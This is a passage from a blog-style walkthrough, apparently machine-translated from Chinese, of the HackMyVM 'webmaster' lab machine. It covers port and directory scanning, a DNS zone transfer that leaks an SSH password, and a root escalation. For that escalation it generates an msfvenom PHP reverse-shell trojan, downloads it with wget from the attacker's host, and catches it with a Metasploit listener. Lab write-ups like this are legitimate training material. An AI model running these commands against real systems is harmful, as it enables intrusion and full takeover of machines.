当前位置:网站首页>Hackmyvm target series (1) -webmaster
Hackmyvm target series (1) -webmaster
2022-07-06 14:03:00 【The moon should know my meaning】
One 、 information gathering
First use nmap Scan segments , Detect live hosts , Since there are many campus network hosts, I won't look for them one by one , Use grep Find the target host directly .
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Port scan the target host , Detect target open services
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8
Scan to three services ,ssh,dns,http
Visit , The discovery is a picture , It roughly means where you keep your password ?Bitwarden and Keepass Baidu is a password management tool . Remember the one below TXT, It's an important reminder .
Use dirsearch Scan the directory .
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30
However, no useful information was found .
The picture above suggests txt, So try to use wfuzz Blow it up txt file
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt
And use dirsearch equally , I haven't found any useful news
Then check the page source code , Find a webmaster.hmv, It looks like a domain name . So put it in host File parsing , But it's no use .
Two 、 Exploit
Think of just using nmap Scan to open dns service , Try to use dig Analyze it dns Record
dig axfr @192.168.200.8 webmaster.hmv
#@IP Address Appoint DNS The server
It's very suspicious to find this thing , It looks like an account and password
john:Myhiddenpazzword
Try signing in ssh, Login successful
Get the first one flag
3、 ... and 、 Elevated privileges
Next is the right raising operation
sudo -l
Find out nginx Can be started by any user , And you don't need to enter a password .
By looking at the process , Find out nginx In order to root Permission started .
Then check the root directory of the web page , Anyone who finds the root directory has the permission to delete and write files , Plus nginx In order to root Permission started , We can write shell, Visit this again shell Get permission .
First check the host information , yes 86 Bit
Use msf Create a Trojan
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
Then use on the target machine wget Download the Trojan horse
wget http://192.168.200.130:7890/shell.php
Grant execution permission
chmod +x shell.php
stay msf Start listening on
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555
kali Access Trojan files , because nginx yes root Permission to run , Visited shell.php When you file, you get root jurisdiction
msf Receive session , Permission is root
Get the last one flag
边栏推荐
- 力扣152题乘数最大子数组
- Brief introduction to XHR - basic use of XHR
- Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
- Hackmyvm target series (3) -visions
- 撲克牌遊戲程序——人機對抗
- 记一次edu,SQL注入实战
- 7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)
- Record a penetration of the cat shed from outside to inside. Library operation extraction flag
- 实验七 常用类的使用(修正帖)
- A complete collection of papers on text recognition
猜你喜欢
Renforcer les dossiers de base de l'apprentissage
内网渗透之内网信息收集(五)
.Xmind文件如何上传金山文档共享在线编辑?
QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
7-5 走楼梯升级版(PTA程序设计)
中间件漏洞复现—apache
Nuxtjs quick start (nuxt2)
1. Preliminary exercises of C language (1)
Write a program to simulate the traffic lights in real life.
Differences among fianl, finally, and finalize
随机推荐
2. First knowledge of C language (2)
Write a program to simulate the traffic lights in real life.
7-9 make house number 3.0 (PTA program design)
FAQs and answers to the imitation Niuke technology blog project (II)
The difference between overloading and rewriting
Experiment 8 exception handling
中间件漏洞复现—apache
Attach the simplified sample database to the SQLSERVER database instance
Relationship between hashcode() and equals()
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
.Xmind文件如何上传金山文档共享在线编辑?
1. First knowledge of C language (1)
7-7 7003 combination lock (PTA program design)
7-1 输出2到n之间的全部素数(PTA程序设计)
【VMware异常问题】问题分析&解决办法
The difference between abstract classes and interfaces
. How to upload XMIND files to Jinshan document sharing online editing?
HackMyvm靶机系列(5)-warez
WEB漏洞-文件操作之文件包含漏洞
强化学习基础记录